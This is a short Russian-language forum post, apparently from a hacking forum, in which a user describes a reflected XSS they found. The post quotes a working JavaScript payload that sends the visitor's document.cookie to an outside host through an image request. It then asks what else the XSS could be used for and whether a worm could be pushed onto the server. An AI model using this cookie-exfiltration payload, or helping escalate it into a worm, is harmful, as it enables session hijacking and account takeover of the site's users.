Показать сообщение отдельно

  #1  
Старый 01.10.2013, 22:39
panfilov1991
Новичок
Регистрация: 22.01.2013
Сообщений: 23
Провел на форуме:
6020

Репутация: 0
По умолчанию

Есть пассивная XSS, работает только с этим кодом:

Код:
img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?

Можно ли загнать на сервер какого нибудь червя?
 
Ответить с цитированием